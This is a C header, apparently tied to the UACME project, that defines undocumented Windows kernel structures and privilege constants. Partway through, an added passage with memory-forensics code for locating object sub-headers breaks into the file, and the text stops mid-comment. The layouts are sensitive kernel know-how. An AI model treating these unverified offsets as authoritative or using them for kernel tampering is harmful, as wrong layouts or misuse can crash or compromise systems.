    ULONG MaxClassLen;
    ULONG Values;
    ULONG MaxValueNameLen;
    ULONG MaxValueDataLen;
    WCHAR Class[1];
} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION;

typedef struct _KEY_BASIC_INFORMATION {
    LARGE_INTEGER LastWriteTime;
    ULONG TitleIndex;
    ULONG NameLength;
    WCHAR Name[1];
} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION;

typedef enum _KEY_VALUE_INFORMATION_CLASS {
    KeyValueBasicInformation,
    KeyValueFullInformation,
    KeyValuePartialInformation,
    KeyValueFullInformationAlign64,
    KeyValuePartialInformationAlign64,
    KeyValueLayerInformation,
    MaxKeyValueInfoClass
} KEY_VALUE_INFORMATION_CLASS;

typedef struct _KEY_VALUE_BASIC_INFORMATION {
    ULONG TitleIndex;
    ULONG Type;
    ULONG NameLength;
    WCHAR Name[1]; // Variable size
} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION;

typedef struct _KEY_VALUE_FULL_INFORMATION {
    ULONG TitleIndex;
    ULONG Type;
    ULONG DataOffset;
    ULONG DataLength;
    ULONG NameLength;
    WCHAR Name[1]; // Variable size
    // Data[1]; // Variable size data not declared
} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;

typedef struct _KEY_VALUE_PARTIAL_INFORMATION {
    ULONG TitleIndex;
    ULONG Type;
    ULONG DataLength;
    UCHAR Data[1]; // Variable size
} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION;

typedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 {
    ULONG Type;
    ULONG DataLength;
    UCHAR Data[1]; // Variable size
} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64;

typedef struct _KEY_VALUE_ENTRY {
    PUNICODE_STRING ValueName;
    ULONG DataLength;
    ULONG DataOffset;
    ULONG Type;
} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY;

/*
** Key END
*/

/*
** TIME_FIELDS START
*/

typedef struct _TIME_FIELDS {
    CSHORT Year; // range [1601...]
    CSHORT Month; // range [1..12]
    CSHORT Day; // range [1..31]
    CSHORT Hour; // range [0..23]
    CSHORT Minute; // range [0..59]
    CSHORT Second; // range [0..59]
    CSHORT Milliseconds; // range [0..999]
    CSHORT Weekday; // range [0..6] == [Sunday..Saturday]
} TIME_FIELDS;
typedef TIME_FIELDS *PTIME_FIELDS;

/*
** TIME_FIELDS END
*/

/*
** HANDLE START
*/

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
    USHORT UniqueProcessId;
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;
    UCHAR HandleAttributes;
    USHORT HandleValue;
    PVOID Object;
    ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
    PVOID Object;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR HandleValue;
    ULONG GrantedAccess;
    USHORT CreatorBackTraceIndex;
    USHORT ObjectTypeIndex;
    ULONG HandleAttributes;
    ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;

typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
    ULONG_PTR NumberOfHandles;
    ULONG_PTR Reserved;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;

/*
** HANDLE END
*/

// Privileges
#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L)
#define SE_CREATE_TOKEN_PRIVILEGE (2L)
#define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L)
#define SE_LOCK_MEMORY_PRIVILEGE (4L)
#define SE_INCREASE_QUOTA_PRIVILEGE (5L)
#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L)
#define SE_TCB_PRIVILEGE (7L)
#define SE_SECURITY_PRIVILEGE (8L)
#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L)
#define SE_LOAD_DRIVER_PRIVILEGE (10L)
#define SE_SYSTEM_PROFILE_PRIVILEGE (11L)
#define SE_SYSTEMTIME_PRIVILEGE (12L)
#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L)
#define SE_INC_BASE_PRIORITY_PRIVILEGE (14L)
#define SE_CREATE_PAGEFILE_PRIVILEGE (15L)
#define SE_CREATE_PERMANENT_PRIVILEGE (16L)
#define SE_BACKUP_PRIVILEGE (17L)
#define SE_RESTORE_PRIVILEGE (18L)
#define SE_SHUTDOWN_PRIVILEGE (19L)
#define SE_DEBUG_PRIVILEGE (20L)
#define SE_AUDIT_PRIVILEGE (21L)
#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L)
#define SE_CHANGE_NOTIFY_PRIVILEGE (23L)
#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L)
#define SE_UNDOCK_PRIVILEGE (25L)
#define SE_SYNC_AGENT_PRIVILEGE (26L)
#define SE_ENABLE_DELEGATION_PRIVILEGE (27L)
#define SE_MANAGE_VOLUME_PRIVILEGE (28L)
#define SE_IMPERSONATE_PRIVILEGE (29L)
#define SE_CREATE_GLOBAL_PRIVILEGE (30L)
#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L)
#define SE_RELABEL_PRIVILEGE (32L)
#define SE_INC_WORKING_SET_PRIVILEGE (33L)
#define SE_TIME_ZONE_PRIVILEGE (34L)
#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L)
#define SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE (36L)
#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE

//
// Generic test for success on any status value (non-negative numbers
// indicate success).
//
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

//
// Generic test for information on any status value.
//
#define NT_INFORMATION(Status) ((ULONG)(Status) >> 30 == 1)

//
// Generic test for warning on any status value.
//
#define NT_WARNING(Status) ((ULONG)(Status) >> 30 == 2)

//
// Generic test for error on any status value.
//
#define NT_ERROR(Status) ((ULONG)(Status) >> 30 == 3)

/*
** OBJECT MANAGER START
*/

//
// Header flags
//
#define OB_FLAG_NEW_OBJECT 0x01
#define OB_FLAG_KERNEL_OBJECT 0x02
#define OB_FLAG_CREATOR_INFO 0x04
#define OB_FLAG_EXCLUSIVE_OBJECT 0x08
#define OB_FLAG_PERMANENT_OBJECT 0x10
#define OB_FLAG_DEFAULT_SECURITY_QUOTA 0x20
#define OB_FLAG_SINGLE_HANDLE_ENTRY 0x40
#define OB_FLAG_DELETED_INLINE 0x80

//
// InfoMask values
//
#define OB_INFOMASK_PROCESS_INFO 0x10
#define OB_INFOMASK_QUOTA 0x08
#define OB_INFOMASK_HANDLE 0x04
#define OB_INFOMASK_NAME 0x02
#define OB_INFOMASK_CREATOR_INFO 0x01

#define OBJ_INVALID_SESSION_ID 0xFFFFFFFF

#define NUMBER_HASH_BUCKETS 37

typedef struct _OBJECT_DIRECTORY_ENTRY {
    PVOID ChainLink;
    PVOID Object;
    ULONG HashValue;
} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;

typedef struct _EX_PUSH_LOCK {
    union {
        struct {
            ULONG_PTR Locked : 1;
            ULONG_PTR Waiting : 1;
            ULONG_PTR Waking : 1;
            ULONG_PTR MultipleShared : 1;
            ULONG_PTR Shared : sizeof(ULONG_PTR) * 8 - 4;
        };
        ULONG_PTR Value;
        PVOID Ptr;
    };
} EX_PUSH_LOCK, *PEX_PUSH_LOCK;

typedef struct _EX_PUSH_LOCK_AUTO_EXPAND_STATE {
    union {
        struct {
            ULONG Expanded : 1;
            ULONG Transitioning : 1;
            ULONG Pageable : 1;
        };
        ULONG Value;
    };
} EX_PUSH_LOCK_AUTO_EXPAND_STATE, *PEX_PUSH_LOCK_AUTO_EXPAND_STATE; /* size: 0x0004 */

typedef struct _EX_PUSH_LOCK_AUTO_EXPAND {
    EX_PUSH_LOCK LocalLock;
    EX_PUSH_LOCK_AUTO_EXPAND_STATE State;
    ULONG Stats;
} EX_PUSH_LOCK_AUTO_EXPAND, *PEX_PUSH_LOCK_AUTO_EXPAND; /* size: 0x0010 */

typedef struct _OBJECT_NAMESPACE_LOOKUPTABLE {
    LIST_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
    EX_PUSH_LOCK Lock;
    ULONG NumberOfPrivateSpaces;
} OBJECT_NAMESPACE_LOOKUPTABLE, *POBJECT_NAMESPACE_LOOKUPTABLE;

typedef struct _OBJECT_NAMESPACE_ENTRY {
    LIST_ENTRY ListEntry;
    PVOID NamespaceRootDirectory;
    ULONG SizeOfBoundaryInformation;
    ULONG Reserved;
    UCHAR HashValue;
    ULONG_PTR Alignment;
} OBJECT_NAMESPACE_ENTRY, *POBJECT_NAMESPACE_ENTRY;

typedef enum _BOUNDARY_ENTRY_TYPE {
    OBNS_Invalid = 0,
    OBNS_Name = 1,
    OBNS_SID = 2,
    OBNS_IntegrityLabel = 3
} BOUNDARY_ENTRY_TYPE;

typedef struct _OBJECT_BOUNDARY_ENTRY {
    BOUNDARY_ENTRY_TYPE EntryType;
    ULONG EntrySize;
} OBJECT_BOUNDARY_ENTRY, *POBJECT_BOUNDARY_ENTRY;

typedef struct _OBJECT_BOUNDARY_DESCRIPTOR {
    ULONG Version;
    ULONG Items;
    ULONG TotalSize;
    ULONG Reserved;
} OBJECT_BOUNDARY_DESCRIPTOR, *POBJECT_BOUNDARY_DESCRIPTOR;

typedef struct _OBJECT_DIRECTORY {
    POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
    EX_PUSH_LOCK Lock;
    PDEVICE_MAP DeviceMap;
    ULONG SessionId;
    PVOID NamespaceEntry;
    ULONG Flags;
} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;

typedef struct _OBJECT_DIRECTORY_V2 {
    POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
    EX_PUSH_LOCK Lock;
    PDEVICE_MAP DeviceMap;
    POBJECT_DIRECTORY ShadowDirectory;
    ULONG SessionId;
    PVOID NamespaceEntry;
    ULONG Flags;
    LONG Padding[1];
} OBJECT_DIRECTORY_V2, *POBJECT_DIRECTORY_V2;

typedef struct _OBJECT_DIRECTORY_V3 {
    POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
    EX_PUSH_LOCK Lock;
    PDEVICE_MAP DeviceMap;
    POBJECT_DIRECTORY ShadowDirectory;
    PVOID NamespaceEntry;
    PVOID SessionObject;
    ULONG Flags;
    ULONG SessionId;
} OBJECT_DIRECTORY_V3, *POBJECT_DIRECTORY_V3;

typedef struct _OBJECT_HEADER_NAME_INFO {
    POBJECT_DIRECTORY Directory;
    UNICODE_STRING Name;
    ULONG QueryReferences;
} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO;

typedef struct _OBJECT_HEADER_CREATOR_INFO { // Size=32
    LIST_ENTRY TypeList; // Size=16 Offset=0
    PVOID CreatorUniqueProcess; // Size=8 Offset=16
    USHORT CreatorBackTraceIndex; // Size=2 Offset=24
    USHORT Reserved; // Size=2 Offset=26
} OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO;

typedef struct _OBJECT_HANDLE_COUNT_ENTRY { // Size=16
    PVOID Process; // Size=8 Offset=0
    struct {
        unsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24
        unsigned long LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8
    };
} OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY;

typedef struct _OBJECT_HEADER_HANDLE_INFO { // Size=16
    union {
        PVOID HandleCountDataBase; // Size=8 Offset=0
        struct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0
    };
} OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO;

typedef struct _OBJECT_HEADER_PROCESS_INFO { // Size=16
    PVOID ExclusiveProcess; // Size=8 Offset=0
    PVOID Reserved; // Size=8 Offset=8
} OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO;

typedef struct _OBJECT_HEADER_QUOTA_INFO {
    ULONG PagedPoolCharge; // 4
    ULONG NonPagedPoolCharge; // 4
    ULONG SecurityDescriptorCharge; // 4
    PVOID SecurityDescriptorQuotaBlock; // sizeof(pointer)
    unsigned __int64 Reserved; // sizeof(uint64)
} OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO;

typedef struct _OBJECT_HEADER_PADDING_INFO {
    ULONG PaddingAmount;
} OBJECT_HEADER_PADDING_INFO, *POBJECT_HEADER_PADDING_INFO;

typedef struct _OBJECT_HEADER_AUDIT_INFO {
    PVOID SecurityDescriptor;
    PVOID Reserved;
} OBJECT_HEADER_AUDIT_INFO, *POBJECT_HEADER_AUDIT_INFO;

typedef struct _OBJECT_HEADER_EXTENDED_INFO {
    struct _OBJECT_FOOTER *Footer;
    PVOID Reserved;
} OBJECT_HEADER_EXTENDED_INFO, *POBJECT_HEADER_EXTENDED_INFO; // pointer typedef needs the '*'

typedef struct _OB_HANDLE_REVOCATION_BLOCK {
    LIST_ENTRY RevocationInfos;
    struct _EX_PUSH_LOCK Lock;
    struct _EX_RUNDOWN_REF Rundown;
} OB_HANDLE_REVOCATION_BLOCK, *POB_HANDLE_REVOCATION_BLOCK;

typedef struct _OBJECT_HEADER_HANDLE_REVOCATION_INFO {
    LIST_ENTRY ListEntry;
    OB_HANDLE_REVOCATION_BLOCK* RevocationBlock;
    unsigned char Padding1[4];
    unsigned char Padding2[4];
} OBJECT_HEADER_HANDLE_REVOCATION_INFO, *POBJECT_HEADER_HANDLE_REVOCATION_INFO;

typedef struct _QUAD {
    union {
        INT64 UseThisFieldToCopy;
        float DoNotUseThisField;
    };
} QUAD, *PQUAD;

typedef struct _OBJECT_CREATE_INFORMATION {
    ULONG Attributes;
    PVOID RootDirectory;
    CHAR ProbeMode;
    ULONG PagedPoolCharge;
    ULONG NonPagedPoolCharge;
    ULONG SecurityDescriptorCharge;
    PVOID SecurityDescriptor;
    PSECURITY_QUALITY_OF_SERVICE SecurityQos;
    SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION;

typedef struct _SECURITY_CLIENT_CONTEXT {
    struct _SECURITY_QUALITY_OF_SERVICE SecurityQos;
    void* ClientToken;
    UCHAR DirectlyAccessClientToken;
    UCHAR DirectAccessEffectiveOnly;
    UCHAR ServerIsRemote;
    struct _TOKEN_CONTROL ClientTokenControl;
    LONG __PADDING__[1];
} SECURITY_CLIENT_CONTEXT, *PSECURITY_CLIENT_CONTEXT;

typedef enum _POOL_TYPE {
    NonPagedPool,
    NonPagedPoolExecute = NonPagedPool,
    PagedPool,
    NonPagedPoolMustSucceed = NonPagedPool + 2,
    DontUseThisType,
    NonPagedPoolCacheAligned = NonPagedPool + 4,
    PagedPoolCacheAligned,
    NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
    MaxPoolType,
    NonPagedPoolBase = 0,
    NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
    NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
    NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
    NonPagedPoolSession = 32,
    PagedPoolSession = NonPagedPoolSession + 1,
    NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
    DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
    NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
    PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
    NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
    NonPagedPoolNx = 512,
    NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
    NonPagedPoolSessionNx = NonPagedPoolNx + 32
} POOL_TYPE;

//
// WARNING: this structure is incomplete; refer to the complete definitions below if you need the actual full variant.
//
typedef struct _OBJECT_TYPE_INITIALIZER_COMPATIBLE { // Size=120
    USHORT Length; // Size=2 Offset=0
    UCHAR ObjectTypeFlags; // Size=1 Offset=2
    ULONG ObjectTypeCode; // Size=4 Offset=4
    ULONG InvalidAttributes; // Size=4 Offset=8
    GENERIC_MAPPING GenericMapping; // Size=16 Offset=12
    ULONG ValidAccessMask; // Size=4 Offset=28
    ULONG RetainAccess; // Size=4 Offset=32
    POOL_TYPE PoolType; // Size=4 Offset=36
    ULONG DefaultPagedPoolCharge; // Size=4 Offset=40
    ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44
    PVOID DumpProcedure; // Size=8 Offset=48
    PVOID OpenProcedure; // Size=8 Offset=56
    PVOID CloseProcedure; // Size=8 Offset=64
    PVOID DeleteProcedure; // Size=8 Offset=72
    PVOID ParseProcedure; // Size=8 Offset=80
    PVOID SecurityProcedure; // Size=8 Offset=88
    PVOID QueryNameProcedure; // Size=8 Offset=96
    PVOID OkayToCloseProcedure; // Size=8 Offset=104
} OBJECT_TYPE_INITIALIZER_COMPATIBLE, *POBJECT_TYPE_INITIALIZER_COMPATIBLE;

//
// WARNING: this structure is incomplete; refer to the complete definitions below if you need the actual full variant.
//
typedef struct _OBJECT_TYPE_COMPATIBLE {
    LIST_ENTRY TypeList;
    UNICODE_STRING Name;
    PVOID DefaultObject;
    UCHAR Index;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    OBJECT_TYPE_INITIALIZER_COMPATIBLE TypeInfo;
} OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE;

typedef POBJECT_TYPE_COMPATIBLE POBJECT_TYPE;

//
// Complete definitions of OBJECT_TYPE + OBJECT_TYPE_INITIALIZER per Windows version.
//
typedef struct _OBJECT_TYPE_INITIALIZER_7 {
    USHORT Length;
    union {
        UCHAR ObjectTypeFlags;
        struct {
            UCHAR CaseInsensitive : 1;
            UCHAR UnnamedObjectsOnly : 1;
            UCHAR UseDefaultObject : 1;
            UCHAR SecurityRequired : 1;
            UCHAR MaintainHandleCount : 1;
            UCHAR MaintainTypeList : 1;
            UCHAR SupportsObjectCallbacks : 1;
        };
    };
    ULONG ObjectTypeCode;
    ULONG InvalidAttributes;
    GENERIC_MAPPING GenericMapping;
    ULONG ValidAccessMask;
    ULONG RetainAccess;
    POOL_TYPE PoolType;
    ULONG DefaultPagedPoolCharge;
    ULONG DefaultNonPagedPoolCharge;
    PVOID DumpProcedure;
    PVOID OpenProcedure;
    PVOID CloseProcedure;
    PVOID DeleteProcedure;
    PVOID ParseProcedure;
    PVOID SecurityProcedure;
    PVOID QueryNameProcedure;
    PVOID OkayToCloseProcedure;
} OBJECT_TYPE_INITIALIZER_7, *POBJECT_TYPE_INITIALIZER_7;

//
// Windows 8, new object type flag, WaitObject* members added
//
typedef struct _OBJECT_TYPE_INITIALIZER_8 {
    USHORT Length;
    union {
        UCHAR ObjectTypeFlags;
        struct {
            UCHAR CaseInsensitive : 1;
            UCHAR UnnamedObjectsOnly : 1;
            UCHAR UseDefaultObject : 1;
            UCHAR SecurityRequired : 1;
            UCHAR MaintainHandleCount : 1;
            UCHAR MaintainTypeList : 1;
            UCHAR SupportsObjectCallbacks : 1;
            UCHAR CacheAligned : 1;
        };
    };
    ULONG ObjectTypeCode;
    ULONG InvalidAttributes;
    GENERIC_MAPPING GenericMapping;
    ULONG ValidAccessMask;
    ULONG RetainAccess;
    POOL_TYPE PoolType;
    ULONG DefaultPagedPoolCharge;
    ULONG DefaultNonPagedPoolCharge;
    PVOID DumpProcedure;
    PVOID OpenProcedure;
    PVOID CloseProcedure;
    PVOID DeleteProcedure;
    PVOID ParseProcedure;
    PVOID SecurityProcedure;
    PVOID QueryNameProcedure;
    PVOID OkayToCloseProcedure;
    ULONG WaitObjectFlagMask;
    USHORT WaitObjectFlagOffset;
    USHORT WaitObjectPointerOffset;
} OBJECT_TYPE_INITIALIZER_8, *POBJECT_TYPE_INITIALIZER_8;

//
// Windows 10 RS1, new ObjectTypeFlags2 flag added,
// ParseProcedure now has two variants with different parameters.
//
typedef struct _OBJECT_TYPE_INITIALIZER_RS1 {
    USHORT Length;
    union {
        UCHAR ObjectTypeFlags;
        struct {
            UCHAR CaseInsensitive : 1;
            UCHAR UnnamedObjectsOnly : 1;
            UCHAR UseDefaultObject : 1;
            UCHAR SecurityRequired : 1;
            UCHAR MaintainHandleCount : 1;
            UCHAR MaintainTypeList : 1;
            UCHAR SupportsObjectCallbacks : 1;
            UCHAR CacheAligned : 1;
        };
    };
    union {
        UCHAR ObjectTypeFlags2; // for ParseProcedureEx
        struct {
            UCHAR UseExtendedParameters : 1;
            UCHAR Reserved : 7;
        };
    };
    ULONG ObjectTypeCode;
    ULONG InvalidAttributes;
    GENERIC_MAPPING GenericMapping;
    ULONG ValidAccessMask;
    ULONG RetainAccess;
    POOL_TYPE PoolType;
    ULONG DefaultPagedPoolCharge;
    ULONG DefaultNonPagedPoolCharge;
    PVOID DumpProcedure;
    PVOID OpenProcedure;
    PVOID CloseProcedure;
    PVOID DeleteProcedure;
    union {
        PVOID ParseProcedure;
        PVOID ParseProcedureEx;
    };
    PVOID SecurityProcedure;
    PVOID QueryNameProcedure;
    PVOID OkayToCloseProcedure;
    ULONG WaitObjectFlagMask;
    USHORT WaitObjectFlagOffset;
    USHORT WaitObjectPointerOffset;
} OBJECT_TYPE_INITIALIZER_RS1, *POBJECT_TYPE_INITIALIZER_RS1;

//
// ObjectTypeFlags2 was merged into the ObjectTypeFlags field, which was extended to USHORT.
// Was it that hard to do this from the beginning?
//
typedef struct _OBJECT_TYPE_INITIALIZER_RS2 {
    USHORT Length;
    union {
        USHORT ObjectTypeFlags;
        struct {
            UCHAR CaseInsensitive : 1;
            UCHAR UnnamedObjectsOnly : 1;
            UCHAR UseDefaultObject : 1;
            UCHAR SecurityRequired : 1;
            UCHAR MaintainHandleCount : 1;
            UCHAR MaintainTypeList : 1;
            UCHAR SupportsObjectCallbacks : 1;
            UCHAR CacheAligned : 1;
        };
        struct {
            UCHAR UseExtendedParameters : 1; // for ParseProcedureEx
            UCHAR Reserved : 7;
        };
    };
    ULONG ObjectTypeCode;
    ULONG InvalidAttributes;
    GENERIC_MAPPING GenericMapping;
    ULONG ValidAccessMask;
    ULONG RetainAccess;
    POOL_TYPE PoolType;
    ULONG DefaultPagedPoolCharge;
    ULONG DefaultNonPagedPoolCharge;
    PVOID DumpProcedure;
    PVOID OpenProcedure;
    PVOID CloseProcedure;
    PVOID DeleteProcedure;
    union {
        PVOID ParseProcedure;
        PVOID ParseProcedureEx;
    };
    PVOID SecurityProcedure;
    PVOID QueryNameProcedure;
    PVOID OkayToCloseProcedure;
    ULONG WaitObjectFlagMask;
    USHORT WaitObjectFlagOffset;
    USHORT WaitObjectPointerOffset;
} OBJECT_TYPE_INITIALIZER_RS2, *POBJECT_TYPE_INITIALIZER_RS2;

//
// OBJECT_TYPE definitions vary only because of OBJECT_TYPE_INITIALIZER changes.
//
typedef struct _OBJECT_TYPE_7 {
    LIST_ENTRY TypeList;
    UNICODE_STRING Name;
    PVOID DefaultObject;
    UCHAR Index;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    OBJECT_TYPE_INITIALIZER_7 TypeInfo;
    EX_PUSH_LOCK TypeLock;
    ULONG Key;
    LIST_ENTRY CallbackList;
} OBJECT_TYPE_7, *POBJECT_TYPE_7; // pointer typedefs below need the '*'

typedef struct _OBJECT_TYPE_8 {
    LIST_ENTRY TypeList;
    UNICODE_STRING Name;
    PVOID DefaultObject;
    UCHAR Index;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    OBJECT_TYPE_INITIALIZER_8 TypeInfo;
    EX_PUSH_LOCK TypeLock;
    ULONG Key;
    LIST_ENTRY CallbackList;
} OBJECT_TYPE_8, *POBJECT_TYPE_8;

typedef struct _OBJECT_TYPE_RS1 {
    LIST_ENTRY TypeList;
    UNICODE_STRING Name;
    PVOID DefaultObject;
    UCHAR Index;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    OBJECT_TYPE_INITIALIZER_RS1 TypeInfo;
    EX_PUSH_LOCK TypeLock;
    ULONG Key;
    LIST_ENTRY CallbackList;
} OBJECT_TYPE_RS1, *POBJECT_TYPE_RS1;

typedef struct _OBJECT_TYPE_RS2 {
    LIST_ENTRY TypeList;
    UNICODE_STRING Name;
    PVOID DefaultObject;
    UCHAR Index;
    ULONG TotalNumberOfObjects;
    ULONG TotalNumberOfHandles;
    ULONG HighWaterNumberOfObjects;
    ULONG HighWaterNumberOfHandles;
    OBJECT_TYPE_INITIALIZER_RS2 TypeInfo;
    EX_PUSH_LOCK TypeLock;
    ULONG Key;
    LIST_ENTRY CallbackList;
} OBJECT_TYPE_RS2, *POBJECT_TYPE_RS2;

/*
** brand new header starting from 6.1
*/
typedef struct _OBJECT_HEADER {
    LONG_PTR PointerCount;
    union {
        LONG_PTR HandleCount;
        PVOID NextToFree;
    };
    EX_PUSH_LOCK Lock;
    UCHAR TypeIndex;
    UCHAR TraceFlags;
    UCHAR InfoMask;
    UCHAR Flags;
    union {
        POBJECT_CREATE_INFORMATION ObjectCreateInfo;
        PVOID QuotaBlockCharged;
    };
    PVOID SecurityDescriptor;
    QUAD Body;
} OBJECT_HEADER, *POBJECT_HEADER;

//
// Actual object header from windows 10-11.
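Added example, not code from ntos.h or UACME: computing where an OBJECT_HEADER's optional sub-headers sit from its InfoMask, which is what a memory-forensics parser needs to walk from a raw OBJECT_HEADER in a dump back to its OBJECT_HEADER_NAME_INFO. It assumes the x64 layout: optional-header sizes of 0x20 (creator, name, quota) and 0x10 (handle, process), consistent with the Size= comments in this file, InfoMask at offset 0x1A of OBJECT_HEADER, and the kernel's cumulative-offset scheme (the ObpInfoMaskToOffset table), in which the optional headers are laid out in front of OBJECT_HEADER with the lowest InfoMask bit nearest.

```c
#include <stddef.h>
#include <stdint.h>

/* InfoMask bits, as defined in this header. */
#define OB_INFOMASK_PROCESS_INFO 0x10
#define OB_INFOMASK_QUOTA        0x08
#define OB_INFOMASK_HANDLE       0x04
#define OB_INFOMASK_NAME         0x02
#define OB_INFOMASK_CREATOR_INFO 0x01

/* Assumption: x64 sizes of the optional headers, listed from the one nearest
 * to OBJECT_HEADER (lowest bit) to the farthest (highest bit). */
static const struct { uint8_t bit; size_t size; } ob_optional_headers[] = {
    { OB_INFOMASK_CREATOR_INFO, 0x20 },   /* OBJECT_HEADER_CREATOR_INFO */
    { OB_INFOMASK_NAME,         0x20 },   /* OBJECT_HEADER_NAME_INFO    */
    { OB_INFOMASK_HANDLE,       0x10 },   /* OBJECT_HEADER_HANDLE_INFO  */
    { OB_INFOMASK_QUOTA,        0x20 },   /* OBJECT_HEADER_QUOTA_INFO   */
    { OB_INFOMASK_PROCESS_INFO, 0x10 },   /* OBJECT_HEADER_PROCESS_INFO */
};
#define OB_OPTIONAL_HEADER_COUNT (sizeof ob_optional_headers / sizeof ob_optional_headers[0])

/* Assumption: byte offset of InfoMask inside the x64 OBJECT_HEADER
 * (PointerCount 0x00, HandleCount 0x08, Lock 0x10, TypeIndex 0x18,
 * TraceFlags 0x19, InfoMask 0x1A). */
#define OBJECT_HEADER_INFOMASK_OFFSET 0x1A

/* Distance in bytes from the start of OBJECT_HEADER back to the optional
 * header selected by `bit`, or 0 when InfoMask says that header is absent.
 * This is the value the kernel keeps at ObpInfoMaskToOffset[InfoMask & (bit | (bit - 1))]:
 * the summed sizes of every present header whose bit is not above `bit`,
 * because exactly those headers lie between the wanted one and OBJECT_HEADER. */
size_t ob_optional_header_offset(uint8_t info_mask, uint8_t bit)
{
    if ((info_mask & bit) == 0)
        return 0;
    uint8_t masked = info_mask & (uint8_t)(bit | (bit - 1));
    size_t offset = 0;
    for (size_t i = 0; i < OB_OPTIONAL_HEADER_COUNT; i++)
        if (masked & ob_optional_headers[i].bit)
            offset += ob_optional_headers[i].size;
    return offset;
}

/* Rebuilds the 32-entry lookup table for the five bits above, so a parser can
 * do one indexed read per header instead of recomputing the sum each time. */
void ob_build_info_mask_table(size_t table[32])
{
    for (unsigned mask = 0; mask < 32; mask++) {
        table[mask] = 0;
        for (size_t i = 0; i < OB_OPTIONAL_HEADER_COUNT; i++)
            if (mask & ob_optional_headers[i].bit)
                table[mask] += ob_optional_headers[i].size;
    }
}

/* Given a raw memory image and the offset of an OBJECT_HEADER inside it,
 * returns the image offset of the OBJECT_HEADER_NAME_INFO, or SIZE_MAX when
 * the InfoMask byte is outside the image, the header carries no name info,
 * or the computed location would fall before the start of the image
 * (a truncated or corrupted dump must not turn into an out-of-bounds read). */
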